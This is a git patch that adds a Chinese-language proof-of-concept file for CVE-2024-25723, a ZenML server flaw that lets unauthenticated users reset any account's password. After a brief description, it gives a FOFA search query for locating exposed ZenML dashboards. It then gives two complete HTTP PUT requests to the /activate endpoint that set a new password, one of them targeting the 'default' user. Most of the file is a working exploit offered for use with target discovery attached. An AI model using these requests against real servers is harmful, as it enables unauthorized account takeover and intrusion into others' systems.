From dc64090fa172ec402a26eb6bc213c7a885f2c633 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 20:23:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20ZenML=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E(CVE-2024-25723).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...L服务器远程权限提升漏洞(CVE-2024-25723).md | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
diff --git a/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md b/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
new file mode 100644
index 0000000..e349201
--- /dev/null
+++ b/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
@@ -0,0 +1,38 @@
+## ZenML服务器远程权限提升漏洞(CVE-2024-25723)
+
+ZenML服务器远程权限提升漏洞(CVE-2024-25723)存在于Python的0.46.7之前的ZenML机器学习包中的ZenML服务,漏洞源于/*/{user_name_or_id}/activate REST API 端点允许基于有效用户名和请求正文中的新密码进行访问,可导致未授权用户远程权限提升,可直接重置任意ZenML账户密码。
+
+
+
+## fofa
+```
+title=="ZenML - Dashboard"
+```
+
+## poc
+```
+PUT /api/v1/users/*/activate HTTP/1.1
+Host:
+User-Agent: python-requests/2.28.1
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Connection: close
+Content-Type: application/json
+Content-Length: 31
+
+{"password": "Ldwk@20240426"}
+
+
+PUT /api/v1/users/default/activate HTTP/1.1
+Host:
+User-Agent: python-requests/2.28.1
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Connection: close
+Content-Type: application/json
+Content-Length: 31
+
+{"password": "Ldwk@20240426"}
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)